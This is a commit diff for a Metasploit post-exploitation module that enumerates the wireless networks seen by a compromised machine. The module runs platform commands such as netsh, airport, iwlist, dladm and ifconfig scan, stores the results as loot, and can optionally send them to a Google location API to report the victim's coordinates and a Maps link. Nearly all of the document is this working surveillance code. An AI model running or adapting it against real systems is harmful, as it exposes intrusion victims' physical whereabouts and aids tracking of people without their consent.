Update wlan_geolocate.rb

TomSellers · TomSellers · commit d4c0d015c1d2 · 2014-04-24T07:04:50.000-05:00
Updated based on feedback.  Also added enumeration only support for BSD and Solaris.
diff --git a/modules/post/multi/gather/wlan_geolocate.rb b/modules/post/multi/gather/wlan_geolocate.rb
@@ -12,15 +12,21 @@ class Metasploit3 < Msf::Post
 
   def initialize(info={})
     super( update_info( info,
-        'Name'          => 'Multiplatform Wireless LAN Geolocation',
-        'Description'   => %q{ Geolocate the target device by gathering local
-        wireless networks and performing a lookup against Google APIs.},
+        'Name'          => 'Multiplatform WLAN Enumeration and Geolocation',
+        'Description'   => %q{ Enumerate wireless networks visible to the target device.
+        Optionally geolocate the target by gathering local wireless networks and
+        performing a lookup against Google APIs.},
         'License'       => MSF_LICENSE,
         'Author'        => [ 'Tom Sellers <tom <at> fadedcode.net>'],
-        'Platform'      => %w{ osx win linux },
+        'Platform'      => %w{ osx win linux bsd solaris },
         'SessionTypes'  => [ 'meterpreter', 'shell' ],
       ))
 
+      register_options(
+        [
+        OptBool.new('GEOLOCATE', [ false, 'Use Google APIs to geolocate Linux, Windows, and OS X targets.', false])
+        ], self.class)
+
   end
 
   def get_strength(quality)
@@ -81,6 +87,35 @@ def parse_wireless_osx(listing)
     return wlan_list
   end
 
+  def perform_geolocation(wlan_list)
+
+    if wlan_list.blank?
+      print_error("Unable to enumerate wireless networks from the target.  Wireless may not be present or enabled.")
+      return
+    end
+
+    # Build and send the request to Google
+    url = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true#{wlan_list}"
+    uri = URI.parse(URI.encode(url))
+    request = Net::HTTP::Get.new(uri.request_uri)
+    http = Net::HTTP::new(uri.host,uri.port)
+    http.use_ssl = true
+    response = http.request(request)
+
+    # Gather the required information from the response
+    if response && response.code == '200'
+      results = JSON.parse(response.body)
+      latitude =  results["location"]["lat"]
+      longitude = results["location"]["lng"]
+      accuracy = results["accuracy"]
+      print_status("Google indicates that the target is within #{accuracy} meters of #{latitude},#{longitude}.")
+      print_status("Google Maps URL:  https://maps.google.com/?q=#{latitude},#{longitude}")
+    else
+      print_error("Failure connecting to Google for location lookup.")
+    end
+
+  end
+
 
   # Run Method for when run command is issued
   def run
@@ -98,66 +133,87 @@ def run
 
       listing = cmd_exec('netsh wlan show networks mode=bssid')
       if listing.nil?
-        print_error("Unable to generate wireless listing..")
+        print_error("Unable to generate wireless listing.")
         return nil
       else
         store_loot("host.windows.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks")
-        wlan_list = parse_wireless_win(listing)
+        # The wireless output does not lend itself to displaying on screen for this platform.
+        print_status("Wireless list saved to loot.")
+        if datastore['GEOLOCATE']
+          wlan_list = parse_wireless_win(listing)
+          perform_geolocation(wlan_list)
+          return
+        end
       end
 
     when /osx/i
 
       listing = cmd_exec('/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s')
       if listing.nil?
-        print_error("Unable to generate wireless listing..")
+        print_error("Unable to generate wireless listing.")
         return nil
       else
         store_loot("host.osx.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks")
-        wlan_list = parse_wireless_osx(listing)
+        print_status("Target's wireless networks:\n\n#{listing}\n")
+        if datastore['GEOLOCATE']
+          wlan_list = parse_wireless_osx(listing)
+          perform_geolocation(wlan_list)
+          return
+        end
       end
 
     when /linux/i
 
       listing = cmd_exec('iwlist scanning')
       if listing.nil?
-        print_error("Unable to generate wireless listing..")
+        print_error("Unable to generate wireless listing.")
         return nil
       else
         store_loot("host.linux.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks")
-        wlan_list = parse_wireless_linux(listing)
+        # The wireless output does not lend itself to displaying on screen for this platform.
+        print_status("Wireless list saved to loot.")
+        if datastore['GEOLOCATE']
+          wlan_list = parse_wireless_linux(listing)
+          perform_geolocation(wlan_list)
+          return
+        end
       end
-    else
-      print_error("The target's platform is not supported at this time.")
-      return nil
-    end
 
-    if wlan_list.nil? || wlan_list.empty?
-      print_error("Unable to enumerate wireless networks from the target.  Wireless may not be present or enabled.")
-      return
-    end
+    when /solaris/i
 
+      listing = cmd_exec('dladm scan-wifi')
+      if listing.blank?
+        print_error("Unable to generate wireless listing.")
+        return nil
+      else
+        store_loot("host.solaris.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks")
+        print_status("Target's wireless networks:\n\n#{listing}\n")
+        print_error("Geolocation is not supported on this platform.\n\n") if datastore['GEOLOCATE']
+        return
+      end
 
-    # Build and send the request to Google
-    url = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true#{wlan_list}"
-    uri = URI.parse(URI.encode(url))
-    request = Net::HTTP::Get.new(uri.request_uri)
-    http = Net::HTTP::new(uri.host,uri.port)
-    http.use_ssl = true
-    response = http.request(request)
+    when /bsd/i
+
+      interface = cmd_exec("dmesg | grep -i wlan | cut -d ':' -f1 | uniq")
+      # Printing interface as this platform requires the interface to be specified
+      # it might not be detected correctly.
+      print_status("Found wireless interface: #{interface}")
+      listing = cmd_exec("ifconfig #{interface} scan")
+      if listing.blank?
+        print_error("Unable to generate wireless listing.")
+        return nil
+      else
+        store_loot("host.bsd.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks")
+        print_status("Target's wireless networks:\n\n#{listing}\n")
+        print_error("Geolocation is not supported on this platform.\n\n") if datastore['GEOLOCATE']
+        return
+      end
 
-    # Gather the required information from the response
-    if response && response.code == '200'
-      results = JSON.parse(response.body)
-      latitude =  results["location"]["lat"]
-      longitude = results["location"]["lng"]
-      accuracy = results["accuracy"]
-      print_status("Google indicates that the target is within #{accuracy} meters of #{latitude},#{longitude}.")
-      print_status("Google Maps URL:  https://maps.google.com/?q=#{latitude},#{longitude}")
     else
-      print_error("Failure connecting to Google for location lookup")
+      print_error("The target's platform, #{platform}, is not supported at this time.")
+      return nil
     end
 
-
     rescue Rex::TimeoutError, Rex::Post::Meterpreter::RequestError
     rescue ::Exception => e
       print_status("The following Error was encountered: #{e.class} #{e}")
